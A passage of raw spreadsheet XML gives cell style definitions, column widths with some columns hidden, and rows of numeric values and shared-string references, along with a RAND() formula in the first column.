      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf quotePrefix="1" borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="11" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="3" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="3" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="12" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="12" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="12" fontId="3" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="8" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="13" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="14" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3"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horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="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hidden="1" min="3" max="3" width="9.25"/>
    <col customWidth="1" hidden="1" min="4" max="4" width="7.88"/>
    <col customWidth="1" hidden="1" min="5" max="5" width="7.75"/>
    <col customWidth="1" hidden="1" min="6" max="6" width="12.25"/>
    <col customWidth="1" hidden="1" min="7" max="7" width="10.75"/>
    <col customWidth="1" hidden="1" min="8" max="8" width="5.13"/>
    <col customWidth="1" hidden="1" min="9" max="9" width="7.0"/>
    <col customWidth="1" min="10" max="10" width="27.38"/>
    <col customWidth="1" min="11" max="12" width="22.75"/>
    <col customWidth="1" min="13" max="13" width="45.38"/>
    <col customWidth="1" min="16" max="16" width="111.63"/>
    <col customWidth="1" min="32" max="32" width="16.63"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="2" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="2" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="2" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="2" t="s">
        <v>7</v>
      </c>
      <c r="I1" s="2" t="s">
        <v>8</v>
      </c>
      <c r="J1" s="3" t="s">
        <v>9</v>
      </c>
      <c r="K1" s="3" t="s">
        <v>10</v>
      </c>
      <c r="L1" s="3" t="s">
        <v>11</v>
      </c>
      <c r="M1" s="3" t="s">
        <v>12</v>
      </c>
      <c r="N1" s="3" t="s">
        <v>13</v>
      </c>
      <c r="O1" s="4" t="s">
        <v>14</v>
      </c>
      <c r="P1" s="4" t="s">
        <v>15</v>
      </c>
      <c r="Q1" s="2" t="s">
        <v>16</v>
      </c>
      <c r="R1" s="2" t="s">
        <v>17</v>
      </c>
      <c r="S1" s="2" t="s">
        <v>18</v>
      </c>
      <c r="T1" s="2" t="s">
        <v>19</v>
      </c>
      <c r="U1" s="2" t="s">
        <v>20</v>
      </c>
      <c r="V1" s="2" t="s">
        <v>21</v>
      </c>
      <c r="W1" s="2" t="s">
        <v>22</v>
      </c>
      <c r="X1" s="2" t="s">
        <v>23</v>
      </c>
      <c r="Y1" s="2" t="s">
        <v>24</v>
      </c>
      <c r="Z1" s="2" t="s">
        <v>25</v>
      </c>
      <c r="AA1" s="2" t="s">
        <v>26</v>
      </c>
      <c r="AB1" s="2" t="s">
        <v>27</v>
      </c>
      <c r="AC1" s="2" t="s">
        <v>28</v>
      </c>
      <c r="AD1" s="2" t="s">
        <v>10</v>
      </c>
      <c r="AE1" s="2" t="s">
        <v>29</v>
      </c>
      <c r="AF1" s="5"/>
    </row>
    <row r="2">
      <c r="A2" s="6">
        <f t="shared" ref="A2:A326" si="1">RAND()</f>
        <v>0.7762661559</v>
      </c>
      <c r="B2" s="6">
        <v>2.0972847E7</v>
      </c>
      <c r="C2" s="6">
        <v>1.0</v>
      </c>
      <c r="D2" s="7"/>
      <c r="E2" s="8"/>
      <c r="F2" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G2" s="8"/>
      <c r="H2" s="6">
        <v>1.0</v>
      </c>
      <c r="I2" s="6">
        <v>276.0</v>
      </c>
      <c r="J2" s="3" t="s">
        <v>31</v>
      </c>
      <c r="K2" s="3" t="s">
        <v>32</v>
      </c>
      <c r="L2" s="3" t="s">
        <v>31</v>
      </c>
      <c r="M2" s="10" t="s">
        <v>31</v>
      </c>
      <c r="N2" s="11" t="s">
        <v>33</v>
      </c>
      <c r="O2" s="4" t="s">
        <v>34</v>
      </c>
      <c r="P2" s="4" t="s">
        <v>35</v>
      </c>
      <c r="Q2" s="6">
        <v>488735.0</v>
      </c>
      <c r="R2" s="7"/>
      <c r="S2" s="6">
        <v>76337.0</v>
      </c>
      <c r="T2" s="7"/>
      <c r="U2" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V2" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W2" s="2" t="s">
        <v>36</v>
      </c>
      <c r="X2" s="6">
        <v>1.0</v>
      </c>
      <c r="Y2" s="6">
        <v>5.0</v>
      </c>
      <c r="Z2" s="7"/>
      <c r="AA2" s="7"/>
      <c r="AB2" s="7"/>
      <c r="AC2" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AD2" s="12"/>
      <c r="AE2" s="12"/>
      <c r="AF2" s="5"/>
    </row>
    <row r="3">
      <c r="A3" s="6">
        <f t="shared" si="1"/>
        <v>0.7090711694</v>
      </c>
      <c r="B3" s="6">
        <v>3.1219427E7</v>
      </c>
      <c r="C3" s="6">
        <v>1.0</v>
      </c>
      <c r="D3" s="6">
        <v>3.1219655E7</v>
      </c>
      <c r="E3" s="8"/>
      <c r="F3" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G3" s="8"/>
      <c r="H3" s="6">
        <v>-1.0</v>
      </c>
      <c r="I3" s="6">
        <v>280.0</v>
      </c>
      <c r="J3" s="13" t="s">
        <v>31</v>
      </c>
      <c r="K3" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L3" s="10" t="s">
        <v>31</v>
      </c>
      <c r="M3" s="10" t="s">
        <v>31</v>
      </c>
      <c r="N3" s="13" t="s">
        <v>38</v>
      </c>
      <c r="O3" s="4" t="s">
        <v>39</v>
      </c>
      <c r="P3" s="4" t="s">
        <v>40</v>
      </c>
      <c r="Q3" s="8"/>
      <c r="R3" s="2" t="s">
        <v>41</v>
      </c>
      <c r="S3" s="8"/>
      <c r="T3" s="8"/>
      <c r="U3" s="8"/>
      <c r="V3" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W3" s="2" t="s">
        <v>42</v>
      </c>
      <c r="X3" s="6">
        <v>1.0</v>
      </c>
      <c r="Y3" s="6">
        <v>0.0</v>
      </c>
      <c r="Z3" s="8"/>
      <c r="AA3" s="8"/>
      <c r="AB3" s="8"/>
      <c r="AC3" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE3" s="8"/>
      <c r="AF3" s="14"/>
    </row>
    <row r="4">
      <c r="A4" s="6">
        <f t="shared" si="1"/>
        <v>0.5039779269</v>
      </c>
      <c r="B4" s="6">
        <v>2.1719935E7</v>
      </c>
      <c r="C4" s="6">
        <v>1.0</v>
      </c>
      <c r="D4" s="6">
        <v>2.1721788E7</v>
      </c>
      <c r="E4" s="8"/>
      <c r="F4" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G4" s="8"/>
      <c r="H4" s="6">
        <v>2.0</v>
      </c>
      <c r="I4" s="6">
        <v>543.0</v>
      </c>
      <c r="J4" s="13" t="s">
        <v>31</v>
      </c>
      <c r="K4" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L4" s="10" t="s">
        <v>31</v>
      </c>
      <c r="M4" s="10" t="s">
        <v>31</v>
      </c>
      <c r="N4" s="10" t="s">
        <v>43</v>
      </c>
      <c r="O4" s="4" t="s">
        <v>44</v>
      </c>
      <c r="P4" s="4" t="s">
        <v>45</v>
      </c>
      <c r="Q4" s="6">
        <v>3300203.0</v>
      </c>
      <c r="R4" s="7"/>
      <c r="S4" s="7"/>
      <c r="T4" s="7"/>
      <c r="U4" s="8"/>
      <c r="V4" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W4" s="2" t="s">
        <v>46</v>
      </c>
      <c r="X4" s="6">
        <v>1.0</v>
      </c>
      <c r="Y4" s="6">
        <v>0.0</v>
      </c>
      <c r="Z4" s="7"/>
      <c r="AA4" s="7"/>
      <c r="AB4" s="7"/>
      <c r="AC4" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE4" s="8"/>
      <c r="AF4" s="15"/>
    </row>
    <row r="5">
      <c r="A5" s="6">
        <f t="shared" si="1"/>
        <v>0.4555477796</v>
      </c>
      <c r="B5" s="6">
        <v>2599840.0</v>
      </c>
      <c r="C5" s="6">
        <v>1.0</v>
      </c>
      <c r="D5" s="8"/>
      <c r="E5" s="8"/>
      <c r="F5" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G5" s="8"/>
      <c r="H5" s="6">
        <v>0.0</v>
      </c>
      <c r="I5" s="6">
        <v>1893.0</v>
      </c>
      <c r="J5" s="13" t="s">
        <v>31</v>
      </c>
      <c r="K5" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L5" s="10" t="s">
        <v>31</v>
      </c>
      <c r="M5" s="13" t="s">
        <v>31</v>
      </c>
      <c r="N5" s="13" t="s">
        <v>47</v>
      </c>
      <c r="O5" s="4" t="s">
        <v>48</v>
      </c>
      <c r="P5" s="4" t="s">
        <v>49</v>
      </c>
      <c r="Q5" s="6">
        <v>194480.0</v>
      </c>
      <c r="R5" s="8"/>
      <c r="S5" s="6">
        <v>194480.0</v>
      </c>
      <c r="T5" s="8"/>
      <c r="U5" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V5" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W5" s="2" t="s">
        <v>50</v>
      </c>
      <c r="X5" s="6">
        <v>1.0</v>
      </c>
      <c r="Y5" s="6">
        <v>2.0</v>
      </c>
      <c r="Z5" s="8"/>
      <c r="AA5" s="8"/>
      <c r="AB5" s="8"/>
      <c r="AC5" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE5" s="8"/>
      <c r="AF5" s="14"/>
    </row>
    <row r="6">
      <c r="A6" s="6">
        <f t="shared" si="1"/>
        <v>0.03056817039</v>
      </c>
      <c r="B6" s="6">
        <v>756800.0</v>
      </c>
      <c r="C6" s="6">
        <v>1.0</v>
      </c>
      <c r="D6" s="6">
        <v>756820.0</v>
      </c>
      <c r="E6" s="8"/>
      <c r="F6" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G6" s="8"/>
      <c r="H6" s="6">
        <v>5.0</v>
      </c>
      <c r="I6" s="6">
        <v>1630.0</v>
      </c>
      <c r="J6" s="13" t="s">
        <v>31</v>
      </c>
      <c r="K6" s="13" t="s">
        <v>32</v>
      </c>
      <c r="L6" s="10" t="s">
        <v>31</v>
      </c>
      <c r="M6" s="13" t="s">
        <v>31</v>
      </c>
      <c r="N6" s="13" t="s">
        <v>52</v>
      </c>
      <c r="O6" s="4" t="s">
        <v>53</v>
      </c>
      <c r="P6" s="4" t="s">
        <v>54</v>
      </c>
      <c r="Q6" s="6">
        <v>88898.0</v>
      </c>
      <c r="R6" s="7"/>
      <c r="S6" s="6">
        <v>1.0</v>
      </c>
      <c r="T6" s="7"/>
      <c r="U6" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V6" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W6" s="2" t="s">
        <v>55</v>
      </c>
      <c r="X6" s="6">
        <v>2.0</v>
      </c>
      <c r="Y6" s="6">
        <v>1.0</v>
      </c>
      <c r="Z6" s="7"/>
      <c r="AA6" s="7"/>
      <c r="AB6" s="7"/>
      <c r="AC6" s="2" t="s">
        <v>51</v>
      </c>
      <c r="AE6" s="8"/>
      <c r="AF6" s="15"/>
    </row>
    <row r="7">
      <c r="A7" s="6">
        <f t="shared" si="1"/>
        <v>0.4102449985</v>
      </c>
      <c r="B7" s="6">
        <v>7630139.0</v>
      </c>
      <c r="C7" s="6">
        <v>1.0</v>
      </c>
      <c r="D7" s="6">
        <v>7630179.0</v>
      </c>
      <c r="E7" s="8"/>
      <c r="F7" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G7" s="8"/>
      <c r="H7" s="6">
        <v>0.0</v>
      </c>
      <c r="I7" s="6">
        <v>50.0</v>
      </c>
      <c r="J7" s="3" t="s">
        <v>31</v>
      </c>
      <c r="K7" s="3" t="s">
        <v>56</v>
      </c>
      <c r="L7" s="3" t="s">
        <v>57</v>
      </c>
      <c r="M7" s="10" t="s">
        <v>31</v>
      </c>
      <c r="N7" s="13" t="s">
        <v>33</v>
      </c>
      <c r="O7" s="4" t="s">
        <v>58</v>
      </c>
      <c r="P7" s="4" t="s">
        <v>59</v>
      </c>
      <c r="Q7" s="6">
        <v>269931.0</v>
      </c>
      <c r="R7" s="7"/>
      <c r="S7" s="7"/>
      <c r="T7" s="7"/>
      <c r="U7" s="8"/>
      <c r="V7" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W7" s="2" t="s">
        <v>60</v>
      </c>
      <c r="X7" s="6">
        <v>2.0</v>
      </c>
      <c r="Y7" s="6">
        <v>0.0</v>
      </c>
      <c r="Z7" s="7"/>
      <c r="AA7" s="7"/>
      <c r="AB7" s="7"/>
      <c r="AC7" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AD7" s="12"/>
      <c r="AE7" s="12"/>
      <c r="AF7" s="5"/>
    </row>
    <row r="8">
      <c r="A8" s="6">
        <f t="shared" si="1"/>
        <v>0.7141538164</v>
      </c>
      <c r="B8" s="6">
        <v>3.8396439E7</v>
      </c>
      <c r="C8" s="6">
        <v>1.0</v>
      </c>
      <c r="D8" s="6">
        <v>4.0330247E7</v>
      </c>
      <c r="E8" s="8"/>
      <c r="F8" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G8" s="8"/>
      <c r="H8" s="6">
        <v>0.0</v>
      </c>
      <c r="I8" s="6">
        <v>1008.0</v>
      </c>
      <c r="J8" s="13" t="s">
        <v>31</v>
      </c>
      <c r="K8" s="13" t="s">
        <v>56</v>
      </c>
      <c r="L8" s="10" t="s">
        <v>61</v>
      </c>
      <c r="M8" s="13" t="s">
        <v>31</v>
      </c>
      <c r="N8" s="13" t="s">
        <v>62</v>
      </c>
      <c r="O8" s="4" t="s">
        <v>63</v>
      </c>
      <c r="P8" s="4" t="s">
        <v>64</v>
      </c>
      <c r="Q8" s="6">
        <v>4902041.0</v>
      </c>
      <c r="R8" s="8"/>
      <c r="S8" s="6">
        <v>476.0</v>
      </c>
      <c r="T8" s="8"/>
      <c r="U8" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V8" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W8" s="2" t="s">
        <v>65</v>
      </c>
      <c r="X8" s="6">
        <v>1.0</v>
      </c>
      <c r="Y8" s="6">
        <v>2.0</v>
      </c>
      <c r="Z8" s="8"/>
      <c r="AA8" s="8"/>
      <c r="AB8" s="8"/>
      <c r="AC8" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE8" s="8"/>
      <c r="AF8" s="14"/>
    </row>
    <row r="9">
      <c r="A9" s="6">
        <f t="shared" si="1"/>
        <v>0.500452583</v>
      </c>
      <c r="B9" s="6">
        <v>5.7718029E7</v>
      </c>
      <c r="C9" s="6">
        <v>1.0</v>
      </c>
      <c r="D9" s="7"/>
      <c r="E9" s="8"/>
      <c r="F9" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G9" s="8"/>
      <c r="H9" s="6">
        <v>0.0</v>
      </c>
      <c r="I9" s="6">
        <v>296.0</v>
      </c>
      <c r="J9" s="13" t="s">
        <v>31</v>
      </c>
      <c r="K9" s="13" t="s">
        <v>56</v>
      </c>
      <c r="L9" s="13" t="s">
        <v>66</v>
      </c>
      <c r="M9" s="13" t="s">
        <v>31</v>
      </c>
      <c r="N9" s="13" t="s">
        <v>0</v>
      </c>
      <c r="O9" s="4" t="s">
        <v>67</v>
      </c>
      <c r="P9" s="4" t="s">
        <v>68</v>
      </c>
      <c r="Q9" s="6">
        <v>8027555.0</v>
      </c>
      <c r="R9" s="7"/>
      <c r="S9" s="7"/>
      <c r="T9" s="7"/>
      <c r="U9" s="8"/>
      <c r="V9" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W9" s="2" t="s">
        <v>69</v>
      </c>
      <c r="X9" s="6">
        <v>1.0</v>
      </c>
      <c r="Y9" s="6">
        <v>0.0</v>
      </c>
      <c r="Z9" s="7"/>
      <c r="AA9" s="7"/>
      <c r="AB9" s="7"/>
      <c r="AC9" s="2" t="s">
        <v>70</v>
      </c>
      <c r="AE9" s="8"/>
      <c r="AF9" s="15"/>
    </row>
    <row r="10">
      <c r="A10" s="6">
        <f t="shared" si="1"/>
        <v>0.01162702783</v>
      </c>
      <c r="B10" s="6">
        <v>2.2448369E7</v>
      </c>
      <c r="C10" s="6">
        <v>1.0</v>
      </c>
      <c r="D10" s="6">
        <v>2.8304327E7</v>
      </c>
      <c r="E10" s="8"/>
      <c r="F10" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G10" s="8"/>
      <c r="H10" s="6">
        <v>8.0</v>
      </c>
      <c r="I10" s="6">
        <v>2299.0</v>
      </c>
      <c r="J10" s="13" t="s">
        <v>31</v>
      </c>
      <c r="K10" s="13" t="s">
        <v>56</v>
      </c>
      <c r="L10" s="10" t="s">
        <v>61</v>
      </c>
      <c r="M10" s="13" t="s">
        <v>31</v>
      </c>
      <c r="N10" s="13" t="s">
        <v>62</v>
      </c>
      <c r="O10" s="4" t="s">
        <v>71</v>
      </c>
      <c r="P10" s="4" t="s">
        <v>72</v>
      </c>
      <c r="Q10" s="6">
        <v>1972313.0</v>
      </c>
      <c r="R10" s="7"/>
      <c r="S10" s="6">
        <v>-1.0</v>
      </c>
      <c r="T10" s="7"/>
      <c r="U10" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V10" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W10" s="2" t="s">
        <v>73</v>
      </c>
      <c r="X10" s="6">
        <v>2.0</v>
      </c>
      <c r="Y10" s="6">
        <v>9.0</v>
      </c>
      <c r="Z10" s="6">
        <v>0.0</v>
      </c>
      <c r="AA10" s="7"/>
      <c r="AB10" s="7"/>
      <c r="AC10" s="2" t="s">
        <v>37</v>
      </c>
      <c r="AE10" s="8"/>
      <c r="AF10" s="15"/>
    </row>
    <row r="11">
      <c r="A11" s="6">
        <f t="shared" si="1"/>
        <v>0.4894125072</v>
      </c>
      <c r="B11" s="6">
        <v>2.8981548E7</v>
      </c>
      <c r="C11" s="6">
        <v>1.0</v>
      </c>
      <c r="D11" s="8"/>
      <c r="E11" s="8"/>
      <c r="F11" s="9" t="s">
        <v>30</v>
      </c>
      <c r="G11" s="8"/>
      <c r="H11" s="6">
        <v>-2.0</v>
      </c>
      <c r="I11" s="6">
        <v>429.0</v>
      </c>
      <c r="J11" s="3" t="s">
        <v>74</v>
      </c>
      <c r="K11" s="3" t="s">
        <v>74</v>
      </c>
      <c r="L11" s="3" t="s">
        <v>75</v>
      </c>
      <c r="M11" s="13" t="s">
        <v>76</v>
      </c>
      <c r="N11" s="16"/>
      <c r="O11" s="4" t="s">
        <v>77</v>
      </c>
      <c r="P11" s="4" t="s">
        <v>78</v>
      </c>
      <c r="Q11" s="6">
        <v>3886309.0</v>
      </c>
      <c r="R11" s="8"/>
      <c r="S11" s="6">
        <v>472495.0</v>
      </c>
      <c r="T11" s="8"/>
      <c r="U11" s="9" t="s">
        <v>30</v>
      </c>
      <c r="V11" s="9" t="s">
        <v>30</v>
      </c>
      <c r="W11" s="2" t="s">
        <v>79</v>
      </c>
      <c r="X11" s="6">
        <v>1.0</v>
      </c>
      <c r="Y11" s="6">
        <v>2.0</v>
      </c>
      <c r="Z11" s="8"/>
      <c r="AA11" s="8"/>
      <c r="AB11" s="8"/>
      <c r="AC11" s="2" t="s">
        <v>37</v>
